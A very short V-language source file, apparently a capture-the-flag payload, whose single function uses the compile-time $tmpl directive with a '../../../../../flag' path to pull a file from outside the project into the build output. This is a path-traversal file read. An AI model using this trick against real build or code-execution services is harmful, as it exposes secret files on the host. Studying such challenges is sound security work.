module aluf

import os
import net

pub fn demo() {
        println($tmpl('../../../../../flag'))
}